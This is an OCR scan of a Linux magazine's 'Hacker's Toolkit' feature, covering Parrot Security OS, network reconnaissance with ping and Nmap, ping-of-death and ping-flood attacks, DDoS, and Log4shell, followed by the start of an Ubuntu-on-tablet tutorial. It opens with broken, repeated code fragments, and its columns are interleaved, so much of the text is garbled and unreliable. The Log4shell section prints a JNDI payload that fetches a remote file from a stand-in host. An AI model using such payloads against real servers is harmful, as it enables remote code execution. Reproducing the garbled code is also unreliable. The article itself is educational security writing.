clear; for (Si = 0; Si < Snumstars ; $i++) {$star_x($i] — $star_s[$i]; if ($star_xf$i] < 0) {$star_x($i] = 80;} Sscreen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refre
lent, lest do gem “rspec-rails”, “~> 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond
nl {redirect_to ©task, notice:'...’} formatjson {head :no_content} else format.html {render action: “edit”} formatjson {render json: ©taskerrors, status: :unprc
ity_to_tasks priority integer $ bundle exec rake db:migrate $ bundle exec rake db’.migrate $ bundle exec rails server validate :due_at_is_in_thejpast def due_at_is_
me.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS - 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrangefO, 479), randrangefl, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type == pyg
tes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for (Si = 0; Si < Snumstars ; $i++) { $star_x[$i] = rand(80); $star_y($i] = rand(24); $star_s[$i]
s ; $i++) { $star_x($i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x[$i] = 80;} $screen->addch($star_y[$i], $star_x{$i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if @taskupdate_
’} formatjson {head :no_content} else format.html {render action: “edit”} formatjson {render json: ©taskerrors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake dfrmigrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in th
rgame from random import randrange MAX_STARS = 100 pygame.initQ screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = 1
s(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type — pygame.QUIT: exit(O) #!/usr/bin/perl $nt
new Curses; noecho; curs_set(0); for ($i = 0; $i < Snumstars ; $i++) { $star_x($i] - rand(80); $star_y[$i] - rand(24); $star_s[Si] = rand(4) + 1;} while (1) { Sscreen-
.]; if ($star_x[$i] < 0) {$star_x(Si] = 80;} $screen->addch($star_y($i], $star_x[$i], “.”);} Sscreen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :deA
ndler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond.to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit” } formatjson {render json: ©taskerrors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priori1
exec rake db:migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAXJSTARS): star =
and(star) while True: clocktick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl Snumstars = 100; use Time::HiRes qw(us
($i = 0; Si < Snumstars ; $i++) { $star_x[$i] = rand(80); $star_y($i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for (Si = 0; $i < Snumstars ; $i++)
reen->addch($starjy[Si], $star_x($i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, :test do gem “rspec-rails”, "~> 2.13.0
■w w

Hacking
Take your Linux skills to
the next level and beyond
96 Hacker’s Toolkit
Discover the tricks used by hackers
to help keep your systems safe.

104 Linux on a Linx tablet


Get Linux up and running on a low-cost
Windows tablet without the hassle.

108 Multi-boot Linux


Discover the inner workings of Grub and
boot lots of OSes from one PC.

112 Build your own custom Ubuntu distro


Why settle for what the existing
distrubutions have to offer?

116 LTTng monitoring


Get to know what all your programs are up
to by tracing Linux app activity.

120 USB multi-boot


We explain how you can carry multiple
distros on a single USB drive.

The Hacker's Manual | 95


Hacker’s Toolkit
Pretty boy and known pirate Jonni Bidwell shows
how to tame your Parrot. Parrot Security OS, that is...

igh-profile headlines involving the when Linux was still young, there probably complex, in fact, that beyond the usual

H gerund 'hacking' are becoming


increasingly common. Nary a day

millions of dollars worth of internet money (or


weren't that many people trying to attack
it. And that’s largely because there weren't
all that many people using it. Within a
goes by without cybercrooks making off with
couple cf years though, that had all
guidance - "don't click suspect links",
"beware of email attachments" and "keep
your software up to date" - there isn't
much tangible advice we can impart to
"priceless’ NFTs). Which changed. Red Hat and openSUSE regular users.
is a shame because lots of the people enshrined Linux's place in the server So instead we look at the tricks used by
defending against all this computer misuse market. Now it’s all over the cloud, on two hackers on both sides of the force. And
would probably describe themselves as billion phones, while some quirky we’ll show you a new Linux distro in the
hackers, too. We'll continue this debate within, individuals use it form of Parrot Security OS. A veritable
but the point is ransomware, denial of service as a desktop operating system. hackers’ toolkit one might say, that will
attacks and even state-sponsored The computing teach you the ways of pen-testing, network
cyber operations are all on the rise. ecosystem has reconnaissance and exploitation. What
In days gone by Linux users might have become could possibly go wrong?
had reason to be aloof. In the early 90s complex. So
Hacker’s Toolkit

Hack the Planet/Parrot


Get started with a persistent USB install of Parrot Security OS
sually for these hacker-themed features we tend
> The hacker

U to make judicious use of Kali Linux, a distro that’s


jam-packed with pentesting and OS I NT (open
source intelligence) tools. But it’s not the only one - Parrot
OS is equally powerful. And we'd urge you to go and grab
knowledge
website
hackthebox.com
has challenges
the Security edition from https://parrotsec.org and write and labs that
it to a USB stick without delay. Then the games can begin. use Pwnbox, a
virtual, browser­
Before exploring Parrot OS, marvel at the stylish
based edition of
MATE desktop. Besides the colourful background, the
Parrot Security.
Applications menu is organised into categories ranging
with everything from privacy tools to text editors. Most
of the specialist software is in the Pentesting category,
so here you'll find password crackers, social engineering One reason Parrot has separate Desktop and
tools and many scanners. The System Services Security editions is that you wouldn’t necessarily want
category enables you to start various database and web all of those root-privileged tools lying around on your
services, which are required for some programs. Or if desktop. Just having them there is a security risk. Not
you’re targeting a locally hosted web application. because someone can exploit them, but because in the
wrong hands they can wreck one’s setup. Similarly it’s
Don’t get ahead of yourself not recommended to use the likes of Kali Linux (which
Many of the programs in the menu are command line by default only uses the root account) as a daily driver.
affairs. If, for example, you go to Pentesting>Web You can, of course, install these (see, for example,
Application Analysis>wig, then a terminal will open https://parrotsec.org/docs/installation.html), but
showing the help page for w/g(the WebApp remember that Parrot Security and Kali Linux can
Information Gatherer). Having read the help page, you also be employed from a USB stick, which obviates
might now be tempted to use this to scan your (least) the need for any kind of installation. That being said,
favourite websites for weaknesses. But probably best it’s a little annoying working from a live environment
not. Wig runs as a regular user, as you can see from and having to remember to save your data on another
the stylish ZSH prompt. But some programs are device or the cloud (since any changes you make in the
automatically run as root, for example Recon-NG (in live environment are lost on shutdown). Fortunately,
the ... menu) or anything that crafts packets or Parrot makes it very easy to create a USB stick with
otherwise requires special access. Some aren't even persistence. Since the Security edition is close to 5GB,
programs at all. If you click 'webshells’ for example, an 8GB USB stick will permit you 3GB of persistent
Parrot just opens up a terminal in the /usr/share/ storage. This is as easy as the three-step walkthrough
webshells directory. (see below) suggests.

Install Parrot

bpt < In!«rn«l vm mth linui MVm o»>b (l«U)


ftniword P>iX«1 volume (lUKS)
for me with window)
Q for *11 tyWrn *nd OevKM WAT)
;<xm»

D Get Parrot DAdd a partition El Persistence is bliss


The first step is to create a regular Parrot Rather than boot the USB, open it in In order for Parrot to recognise the
USB. Download an ISO from https:// Gnome Disks or Gparted. You’ll see some persistence partition, it must contain a file
parrotsec.org. We’d recommend using free space at the end of the drive. Create named persistence.conf, which in turn
Balena Etcher or one of the many other a new Ext4 partition in this space and contains the text / union. You should
graphical USB writing tools out there, but optionally give it a label. Once that's done be able to do this from any text editor,
feel free to write the ISO to USB from the the new partition should be visible in your depending on how filesystem permissions
command line if you must. file manager. have been set.

The Hacker’s Manual | 97


Hacking

Hacking 101
Starting with the humble ping command and moving on
to some stealthy network recon activities...
lmost 10 years have passed since the infamous involves sending an ICMP packet to a host (or hosts

A 'Learn to Hack’ feature got us in trouble with


Barnes & Noble, but just in case let's start with a
as we’ll see). If the host(s) haven't been configured
to block or ignore these, then it’ll reply with an
warning. The word "hacking” has unfortunately been acknowledgement packet.
co-opted by the media and entertainment industries, It’s not helpful to block ICMP packets since they're
where it's repeatedly used to denote any and all illegal useful for diagnosing network faults. However, if you
activities done on a computer. The traditional (and cast your mind back to 1997 (and were lucky enough to
correct!) usage of the word refers to much more have access to a network back then) you might recollect
honourable pastimes: tinkering, reimagining and making a popular artefact dubbed the “Ping of Death". The
machines behave in a way other than how they were attack worked by creating an ICMP packet that’s larger
designed to behave. than expected (pings are only supposed to be 64 bytes).
Wait, that wasn’t a warning. This is though: whatever This is divided into chunks and then sent to the target
you learn in this feature, be aware that inappropriate machine, which receives the chunks, tries to put them
use of computers can land you in a lot of trouble. Some back together and then promptly encounters a buffer
of the tools featured here can do real damage. It’s also overflow because innocent TCP/IP stacks of the past
simple for a skilled defender to detect their use, trace allocated only the memory required for a correctly sized
your IP address and alert the authorities. There are skills response packet. And then didn’t check those bounds
and tricks to not getting caught and we're not going to before trying to store it, crashing the system.
teach you them. So please keep all your break-in
attempts, covert reconnaissance and Bobby’ DROP Beware the ping of death
TABLES-style SQL injections restricted to your own F/nghas been around since 1983, and most OSes have
infrastructure. There's a lot to learn from poking around their own implementation of the program. Prior to 1997,
your home network. Who knows, maybe you’ll discover pretty much all of them were vulnerable to the ping of
a misconfiguration or even a vulnerability in your router, death. Windows 95’s version, for example, enabled the
or a Raspberry Pi accidentally left exposed to the world. user to specify a "load" parameter, which set the size of
Let’s start by using Parrot OS tc do some network the packet’s data field. This is supposed to be 56 bytes
reconnaissance. Specifically, we’re going to try and (the header is an additional eight bytes), but the
identify every machine on our network. command would accept arbitrary values. Setting it to
Before we avail ourselves of Parrot's mighty arsenal around 65,500 was generally enough to cripple a target
we’re going to see how far we can get with the humble machine. Since this attack was widely publicised, it didn't
ping command, which is available on all OSes. 'Pinging' take long for servers and workstations around the internet

File Capture View Help

II ■ * E =
Next Pause Stop Pref. Prot. Nodes

Protocols
fe80:
fdW56C:397f
:8f03:9561:a68e:7799
fe80::1813:6bab afe§0::f53b:a*2:2275:9683
fe80::803:5>2d;d7a8:8f6
ICMP fe80::fcde 41d5:8556
239.255*^55.250
>uters
239.255t250.250x
230.WL1
224.0t0.252
ICPMPV6 ff02t:l:3
224
dns.google
192.168*1 3X2fo^.
NETBIOS-NS 157.240.221.24
192.168*133.24>-
) In just a 192.16€. 133.1
IP_UNKNOWN 192.168tl33.203
197^8.133.20
few seconds 192.i68tl33.175
EtherApe had ^^^^092.168.133.45
MDNS 192.168tl33.118
sniffed the traffic 1921fo.133.48
192.168tl33.110
from a sizeable -192.168.133.57
192.168.133.87
chunk of Future J92.lfo.133.76
192.168.133. ^33.81
Towers' review UDP-UNKNOWN
network.

98 | The Hacker’s Manual


Hacker’s Toolkit
to be patched with appropriate malformed packet filters
and bounds checks.
Linux's ping command still permits a size
parameter, but if you use a ping of death yourself, for
example you can try:
$ ping 127.0.0.1 -c4 -s 65500
you'll see that nary a single packet is returned, and that
your machine didn’t die. There's no real point sanitising
the input of the ping program in this case. Remember that
it's the kernel which does the communicating with
network hardware, and anyone could write their own ping
program to make those kernel calls with whatever
parameters they desire. This effort would deter
inexperienced script kiddies, but not veteran attackers.
The idea behind the ping of death can be generalised
to other IP packets, but the defences have been put in > ASCII UFO invaders are coming to war drive your wireless network. Oh no, wait -
place by now. That didn't stop the IPv6 ping of death it’s just the Airgeddon splash screen. Stand down, people.
making a brief appearance on Windows in 2013, though.
as they flow through your network. And from those
Capture the broadcast flag packets we can collect source and destination
One of the lesser-known ping features is the broadcast addresses. We'll use the EtherApe tool to do this,
flag, and that's what we’re going to leverage to do the which rather pleasingly draws hosts in an ellipse as
network recon. As we hinted earlier, this enables not just they’re discovered in real time, as well as showing the
one machine to be pinged, but a whole subnet. Try the
following command at home, replacing the first bits of the
IP address as appropriate (255 is a ‘reserved octet' that
Analyse your network
denotes the broadcast address, in this case everything
from 192.168.0.1 to 192.168.0.254):
“We send a packet to the
$ ping -b -c 4 192.168.0.255 broadcast address and then wait
Here we send a packet to the broadcast address and
then wait for four response packets from each machine. for four response packets from
Note that the command gives you a warning that you’re
pinging a broadcast address, since users would be
each machine.”
mighty confused if they thought a single host was
replying from multiple addresses. You should see traffic flows between them. You'll find EtherApe in the
responses from some of the computers on your Applications menu under the Pentesting>lnformation
network, though many OSes (including most Linux Gathering section.
distros) don’t by default respond to this type of Having got an idea of the number of machines on
broadcast. Identifying which machine is which is our network, we could do some deeper observation
tricky at this stage (unless you pull up your router s of packets to see what they're up to. The Wireshark
configuration page), but at least it gives us an idea of program is industry standard for this task, and easy to
the number of devices on your network. You’ll also see get started with (click Pentesting>Most used tools).
the total roundtrip time, which can be used to diagnose Hackers, good and bad, use packet captures (pcaps)
network congestion or routing issues. We’ll talk more obtained from the likes of WiresharK for everything from
about weaponising pings later. For now let’s get back to recon to reverse engineering. Alternatively we can use
our network recon. Nmap, another ubiquitous hacker tool (it even appeared
A more effective (and less visible) way to enumerate in the second Matrix film), to scan our network and find
the machines on your LAN is to passively 'sniff packets out what those machines are up to.

Introducing Nmap
Parrot comes with a handy GUI front-end that first 24 bits of the (32-bit) IPv4 address. Now hit
saves you learning (at least until the next page) the Start button and the background terminal
Nmap S lengthy command line syntax. You'll will jump into life while the scan completes.
find it under Pentesting >lnformation When it’s done save the list of discovered IPs
Gathering>Nmapsi4. There's an option to run it using the button at the top. We'll analyse these
as root, but don't worry about that for now. further over the page. If you set up USB
From the welcome screen select Discover a persistence as described earlier, and booted
network, then specify a CIDR address and prefix using one of the Persistence modes from the
length. To scan the 256 address beginning with Advanced menu, then you can save it in the
192.168.0. for example, use the address default user's home folder and it’ll still be there
192.168.0.0 with a prefix size of 24. If you like on reboot. Otherwise don't worry because it’s
binary that's all the addresses which match the easy to regenerate this list later.

The Hacker's Manual | 99


Hacking

Nmap deep dive


Nmap, the stealthy port scanner, is a vital tool for any helpful
hacker or nefarious network administrator’s arsenal.
e've seen how the humble ping command can tell $ sudo nmap 192.168.0.0/24

W us not just if our machines are reachable, but how


many of them are on the local network. If we read
This will scan the local network as before, but instead
of pinging the machines it'll probe the 1,000 most
into the timings column a bit. we might even speculatecommon
how far away these machines are. However, for network
about service ports on each machine, and tell you if
any are listening. As well as this, when we run it as root it
reconnaissance and port scanning, you can't beat Nmap. gives us some additional information about each host.
J Once you’ve
Since we've already got an XML list of machines on our Namely its MAC address and the manufacturer
discovered your
LAN it would be nice if we could re-use it here to save identification associated with that. This is our favourite
network click
Scan Options to
scanning again. Sadly, the XML files generated by way of finding the IP addresses of Raspberry Pis on our
commence more Nmapsi4’s network discovery cannot be easily digested home networks. Since we tend to have enabled SSH on
thorough script by Nmap itself (or we couldn't figure out a way). So let's most of these devices, we need only scan port 22 here:
scanning of open a terminal and do it manually. To start, simply enter $ sudo nmap -p22 192.168.0.*
the machines. the following: As you can see. Nmap doesn’t mind if you prefer
wildcards or subnet masks. Just a small caveat though:
ions Places System W I!
the Pi 4 uses a different Ethernet adapter than its
nmapsi4

x Scan Options . i Save IP list B Load IP list 0 Control _ predecessors, so this shows up as something other than
ph read: I
ft Network discover
Raspberry Pi Foundation
-Proce
sThread:! Discovered Probe
discover
IP/s Probes Modes: --tcp-connect Spotting running services
f.168.13
discover r 192.168.133.1

92.168. r 192.168.133.35
192.168.133.55
CIDR Notation address Range of IP
Let's forget about st'ay Pis and consider the services
discover
[92.168. 192.168.133.87 CIDR Notation (IPv4) running on your own network. Looking at the previous
nscover
92.168.
r 192.168.133.175
192.168.133.118
Selected your CIDR address: scan results may (depending on what the boxes on your
Cl DR Address: 192
Jiscover r 192.168.133.213 network are doing) reveal hosts running SSH, web
192.168.
Jiscover
r 192.168.133.255 Prefix Size:
interfaces, Windows File Sharing (NetBIOS/SMB/CIFS),
Number of IP: 256
92.168.
nscoverj remote desktop (VNC/RDP) as well as some things
Or you can paste Cl DR address below:
92.168.
Cl DR address:
you've probably never heard of. The services running may
nscover
[92.168. be different to those listed - service names are just
ft Start with ClDR-styte address
assumed from the port number at this stage.
Packets trace Now consider your home router. It’ll almost certainly
be running a web control panel on port 80, but there
may be all kinds of other services running. If you want to

Northern Exposure scan every single port, you could do so with:


$ sudo nmap -pl-65535 192.168.0.1
This isn’t particularly smart, though. Nmap's default
The Common Vulnerabilities and Exposures (CVE) database is a fantastic SYN scan may be stealthy, but it's not fast at scanning
dataset operated by The Mitre Corporation at the behest closed ports. Those ports might reject the incoming SYN
of the US government. It tracks vulnerabilities as they’re discovered and
packets, in which case the scan will finish quickly. Or the
cross-references them with the internal tracking systems of companies and
connection attempts will be silently dropped, leaving
distros, so it's easy to determine which versions
Nmap waiting for a response that’s never coming. Or
or which releases are vulnerable.
In addition to CVE, there’s the associated National Vulnerabilites Database there could be a rate-limiting firewall in effect.
(https://nvd.nist.gov), where CVEs are rated by severity. Several of the If you leave the previous command running for a
CVE numbers related to the ShellShock vulnerability score a perfect 10. As do while and then push Space, you’ll see a progress
other CVEs that affect popular software, allow remote code execution and estimate and an estimated time of completion. In our
can be carried out by fools (script kiddies). ’Person in the middle’ attacks, case this was close to a day, so we thought we’d try a
which might be hard to pull off in the real world and only lead to user different tool. Masscan (Information Gathering>Network
impersonation or limited information leakage, might score more modestly. & Port Scanners) took a mere 15 minutes to tell us it
Besides CVE entries, you can
couldn’t find any services running on obscure ports.
also search the Common Platform Enumerations (CPE) da:abase, which
Note the increase in the noise in our reconnaissance
makes it easy to find vulnerabilities in a particular product.
so far. We started by silently spying on the network with
Sooner or later someone will release Proof of Concept (PoC) code
showing how to exploit a particular vulnerability. Ideally, this happens after Etherape, did a barely detectable probe with Nmapto
the issue is responsibly disclosed to the affected vendors or projects, giving find all the hosts, and now we’re picking one host and
them time to ship patches. If not, it's a race between cyber fiends attacking doing thorough inspections. And it’s about to get worse.
and security teams patching. We can use Nmapto perform OS and service version
detection too, though sometimes this results in

100 | The Hacker's Manual


Hacker’s Toolkit
i£| Applications Places System P 4>) □ Tue May 10,12:3! > There are a
(@) Privacy ►
huge number of
tools carefully
■ Office ►
categorised
* Internet ► (£) • DNS Analysis
within the
Graphics ► (£) • IDS/IPS Identification
Pentesting menu.
tf* Sound & Video ► (?) • Live Host Identification
Nmap here will
* 1 Games ► @) • Network & Port Scanners
be our first
@ Most Used Tools ► ® • OSINT Analysis
Pentesting ► port(scan) of call.
?) • Route Analysis
hk Programming ► (£ Information Gathering
@) • SMB Analysis
• ■ System Tools ► (8) Vulnerability Analysis
> (J). SMTP Analysis
@ System Services ► Ai. Web Application Analysis
(?) • SNMP Analysis
it Accessories ► ig) Exploitation Tools
® • SSL Analysis
it Universal Access ► @ Maintaining Access
@ Post Exploitation
5 dmitry

ft


ike-scan
(S) Password Attacks
Maltego
@ Wireless Testing
netdiscover
Trash (£•) Sniffing & Spoofing k Nmapsi4 - QT GUI for Nmap

Digital Forensics
Network exploration or security auditing with QT GUI
(§) Automotive
iMiiiop - me imciwui k i»idppei
© Reverse Engineering
* DpOf

(S) Reporting Tools ► recon-ng

E wireshark
JJ Menu 1ES

guesswork if it encounters unknown fingerprints. Our machine. Out of curiosity, we thought we’d investigate
router, the previous scan results suggest, might have a the UPnP server running on our router:
web control panel running on port 80, and a UPnP server $ nmap -p 5000 -A -script vulners 192.168.0.1
running on port 5,000. Change those numbers below to We were simply aghast to find th s in the output:
suit your situation. Running I vulners:
$ nmap -A -p80,5000 192.168.0.1 I cpe:/a:miniupnp_project:miniupnpd: 1.9:
told us that the web server was Lighttpd and the other
was MiniUPnpd. That your router has so many services I EDB-ID:43501 7.5 https://vulners.
running (and there may be others hiding behind port­ com/exploitdb/EDB-ID:43501 ‘EXPLOIT*
knocking protocols) isn't necessarily a worry in itself. I CVE-2017-8798 7.5 https://vulners.
We’ve only scanned the LAN interface, in other words com/cve/CVE-2017-8798
from the inside. If there were so many ports open from Looking at the links told us this was an integer
the outside, that would probably be cause for concern. In signedness error in versions 1.4-2.0 of the MiniUPnP
order to scan it from the outside we need to know its client, and that vulnerable systems could be exploited by
external IP address, which is easy to find using a weosite a Denial of Service attack. While it would be exciting
such as httpsrZ'ipinfo.io.
Exploiting a vulnerable service is usually a critical
step in any illicit computer activity. Last year's Log4shell
Tap into nmap’s potential
vulnerability in a Java logging framework affected
thousands of applications, from Elasticsearch
“Thanks to Nmap’s powerful
containers to Minecraft servers. Unfortunately, many script engine (NSE), all manner of
servers remain unpatched, not just due to administrator
laziness, but because Log4j (the vulnerable framework) custom tasks can be arranged.”
is often buried deep within major applications’
dependencies. Research by Rezilion (see https://bit. playing with the Proof of Concept (PoC) code referenced
Iy/lxf290-rezilion-research) shows not only in those links, it would be for naught. Because this is a
thousands of machines still running vulnerable Log4j 2.x vulnerability in the client program, rather than the server.
versions, but also thousands of machines running older This is an important distinction, because
1.x versions of Log4j. The 1.x series is unmaintained, and portscanning in general can only tell you about
while it might be Log4shell proof, is vulnerable to vulnerable services on the host. There may be plenty of
countless other known attacks. other vulnerabilities in other software running on the
target (and indeed in the human operating it), but Nmap
Deeper probing with Nmap can't help you with this. These scripts only check version
Besides network recon and service discovery, Nmap can information (often only Nmap's best guess at that) so
probe even further still. Thanks to its powerful script seeing output similar to the above shouldn’t be an
engine (NSE), all manner of custom tasks can be immediate cause for panic.
arranged. One of the most useful scripts is provided by Remember that vulnerabilities may only affect
security group Vulners.com. It uses Nmap's ability to certain features of certain programs running in certain
detect the versions of running services, together with configurations. But it's always worth investigating, which
known vulnerability databases to tell you in excruciating is where tools like Pompem (see Pentesting>Exploitation
detail which vulnerabilities might affect the target Tools>Exploit Search) come in handy.

The Hacker’s Manual | 101


Hacking

Modern hacking,
ethics and statistics
Read about the largest DDoS in history and how honing
your hacking skills might help you prevent the next one...
gerund and an infinitive walk in to the Linux kernel. playground, or later from first-person shooters such as

A They were hacking to learn. An awful adaptation of


a (drinking to forget) joke, but a reasonable opener.
An incredibly useful maxim from long ago hacker lore is
“don’t learn to hack, hack to learn". It’s worth taking some
Unreal Tournament. The traditional idea is that teams
compete to try and capture the flags from opposing
teams’ bases and return them to their own. But the
hacker version just involves finding flags (sometimes just
time to marinate on this message. empty files called flag, sometimes more interesting
For example, if you search Google for "how to hack" or items) hidden by whoever set the challenge.
worse "how to hack gmail", we can pretty much guarantee
you won’t find any useful information. Indeed, you’ll Open the floodgates
probably find all sorts of spam and phishing links that we We started with the ping of death, so let’s end with the idea
wouldn't recommend touching, even with JavaScript of a ping flood. Instead of a single malformed packet, a
turned off. This isn’t because search engines are producing huge number of legitimately sized ones are transmitted.
increasingly bad search results, but because hackers and The idea is to overwhelm the target machine by sending
advertisers know the kinds of intellects who are searching more pings than it can handle. Both the Ping of Death and
for these terms. ping flooding are part of the broad category known as
Yet there are plenty of good resources where you can Denial of Service (DcS) attacks.
learn network reconnaissance, penetration testing and On Linux some features of the ping command are
even phishing techniques. Sites like https://tryhackme. only available when they’re run as root. One such
com. for example, will teach you these skills with a view example is the -f or flood option, which when used on
to learning how to defend against them. TryHackMe its own sends echo requests as quickly as possible. In
makes the learning process fun by gamifying tutorials, in favourable circumstances (the attacker has significantly
some cases giving you VMs to download and intrude. more bandwidth than the defender, and the defender
There are lessons, labs and competitions that will help has no DoS-preventing firewall), it’s possible for one
you learn everything from Metasploitto Maltego. machine to cripple another this way. It's more common,
A big part of hacker culture is Capture The Flag (CTF) however, for an attacker to use several hosts to send the
challenges. You might remember this one from the pings, making this a Distributed Denial of Service (DDoS)

Armitage
is a GUI for
Metasploit. To
use it make
sure you start
the Metasploit
Framework from
the System
Service menu.

102 | The Hacker's Manual


Hacker’s Toolkit
attack. Ping floods are defended against by most
routers, as are SYN floods and other things.
These are detectable by one’s garden variety packet­
filtering stack.
The actual DDoS-ing is typically done by a botnet
under the attackers control. Cybercrime groups may
rent out sections of a hoard of zombie machines that
they've curated, or they may use that hoard directly. So
attacks have involved a huge amount of bandwidth. In
2016 DNS provider Dyn was taken offline (making many
popular websites inaccessible) as result of the Mirai
malware, which mostly infects loT devices using default
credentials. The total bandwidth of this attack was
estimated to be in the region of 1.2Tbps. Security
commentators of the era lamented that the net had
been crippled by a telnet scanner and 36 passwords. In
November 2021, Microsoft revealed it had thwarted the
largest DDoS attack in history, topping out at 3.47Tbps. puzzle for the ages. As we're fans of digital history here, > Wireshark can
That's 3,000 times more data than gigabit LAN. A UDP we have most of that site archived in a virtual machine. smell packets
reflection attack was to blame, but there are plenty of And since we're talking about hacker toolkits today we on your LAN
other types of DDoS attacks that are more sophisticated. figured we’d have a go at compromising said virtual from miles away.
Pretty much
The Log4shell vulnerability took advantage of machine. Nmap evinced that our venerable, vulnerable,
nothing gets
unsanitised input and at worst enabled remote code virtual machine was running the following ancient
past it.
execution. All an attacker had to do was cause a software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7pl
carefully crafted message, which looked something like and Subversion (no version number detected).
${jndi:ldap://example.com/bad_file} But try as we might, none of the exploits that we
to be written to a log file. tried would work. We used ZAP (the Zed Attack Proxy)
Like Bash, Log4j performs string substitution on from 0WASP (the Open Web Application Security
expressions in curly brackets. In the right circumstances, Project, https://owasp.org) to try and attack the old
the contents of /bad_file might be executed immediately archive forms, but nothing. If you’re interested. ZAP
on the server. Or the log may be processed on another works by setting up a person in the middle proxy
server and /bad_file executed there later. If code that can manipulate requests because they're
execution is dodged, then an attacker can still cause the sent to the web server under investigation, and
vulnerable machine to send data (such as environment inspect responses.
variables or form contents) to their machine. We also tried Metasploit, which
would be a whole feature (or even a
False sense of security bookazine) in itself. But the ghost cr our
Here we’re abusing the Java Naming and Directory machine, it seems, was as resilient
Interface's (JNDI) ability to fetch resources via LDAP, but as its former self. Ideas, anyone? Oh
other protocols can be used to. As a result a numbe- of and one more thing. We ask politely that you
related flaws were discovered soon after the first, and a don’t try and pentest our new website,
number of incomplete mitigations were circulated initially, because you will fail and Future’s
creating a very false sense of security. Once Operations Team will hunt you down.
compromised, machines were enrolled in botnets,
crippled with ransomware, or became unwitting
cryptocurrency miners.
It's interesting that the Dyn attack has been The math of DDoS
attributed (though not conclusively - all we really know
is that in 2017 three individuals aged 20-21 entered
When you ping another machine, you send packets of a given size (usually
guilty pleas relating to “significant cyber attacks”) to 64 bytes on Linux), and that machine replies with packets of the same size.
disgruntled Minecraft players, and so too was Log4j. So, as much data is sent as is received. If the goal is to saturate the target's
Indeed, to exploit Log4j on a vulnerable Minecraft server, network bandwidth, then the attacker needs to be able to send just a little bit
all you needed to do was post the code snippet above more data than the target can receive. This is also true for a SYN flood
into the chat. From there it would be dutifully processed attack.
by Log4j and if various conditions are met the attacker More advanced DDoS attacks take advantage of the fact that other
would be able to execute code. requests can result in much more data being returned than is sent. The most
And there concludes our perennial hacker special. As
advanced ones to date have leveraged intermediate servers (NTP, DNS.
memcached. even Quake servers) to carry out this amplification. These
usual we've barely scratched the surface of the subject
‘reflection attacks' spoof the target's IP address so that the lengthy response
matter, and indeed dealt with only a fraction of the
is sent there. For UDP protocols (like traditional DNS) this is always going to
fantastic selection of tooling within Parrot. But hopefully be a problem, since source addresses can't be directly verified. Initiating a
you've learned something. We certainly have. Many TCP connection, on the other hand, requires a three-way handshake that will
readers will remember with fondness the old Drupal- fail if the address is spoofed. But the connection remains 'half-open' for
based Linuxformat.com site. Quite how this stayed up some time, and the resources used by thousands of such half-completed
for so long, and more importantly how we managed to connections, form the basis of a SYN flood attack.
avoid invoicing for so long (13 years to be precise), is a

The Hacker’s Manual | 103


Hacking

Ubuntu: Linux
on a tablet
It’s time to dig deep and discover how to successfully install a working
version of Ubuntu on a low-cost Windows 2-in-l tablet.

re you jealous of the sudden proliferation of cheap You're likely to find enthusiasts such as John Wells

A Windows 2-in-l tablets? Wish you could run Linux on


it instead? Spanish smartphone manufacturer. BQ.
may be teaming up with Canonical to sell the Aquarius MIO
tablet with Ubuntu pre-installed, but with the price tag
(www.jfwhome.com). who has detailed guides and
downloadable scripts to getting Ubuntu running on an Asus
Transformer T100TA tablet with most of the hardware
working. Another good resource is the DebianOn wiki
expected to be north of £200, why pay more when it turns (https:Z^wiki.debian.org/lnstallingDebianOn) where you’ll
out you can - with a fair amount of tweaking - get Linux to find many other tablets are featured with guides to what
install on one of those cheap Windows devices? works, what issues to look out for and handy links and
These devices all use a low-end Intel Atom quad-core downloads for further information.
processor known collectively as Bay Trail, and we managed to Sadly - for us - there's no handy one-stop shop for the
source one such tablet, which we've made the focus of this Linx 1010 tablet, so we had to do a fair bit of experimenting
tutorial. The device in question is a Linx 1010, which sports an before we found the best way forward for us (see
Atom Z3735F processor, 2GB RAM 32GB internal EMMC Experimenting with Linux support over the page).
(plus a slot for additional microSD card), two full-size USB
ports and a touchscreen with multi-touch support. It can be Install Linux on Linx
bought with detachable keyboard and trackpad through the We decided to go down the Ubuntu route when it came to the
likes of www.ebuyer.com for under £150. These devices Linx 1010 tablet. We're indebted to the hard work of Ian
come with Windows 10 pre-installed, but as you’ll discover, it’s Morrison for producing a modified version of Ubuntu (14.04.3
possible to both run and install flavours of Linux on them. LTS) that not only serves as a live CD, but also works as an
In a perfect world, you'd simply create a live Linux USB installer. We experimented with later Ubuntu releases -15.10
drive, plug it in and off you go. but there are a number of and a daily build of 16.04 - but while the live distros work fine,
complications to overcome. First, these tablets pair a 64-bit installing them proved to be impossible. Still, all is not lost, as
processor with a 32-bit EFI - most distros expect a 64-bit you'll discover later on. So, the simplest and easiest way to
processor with 64-bit EFI, or a 32-bit processor with install Ubuntu on your Z3735F-powered tablet is to use Ian's
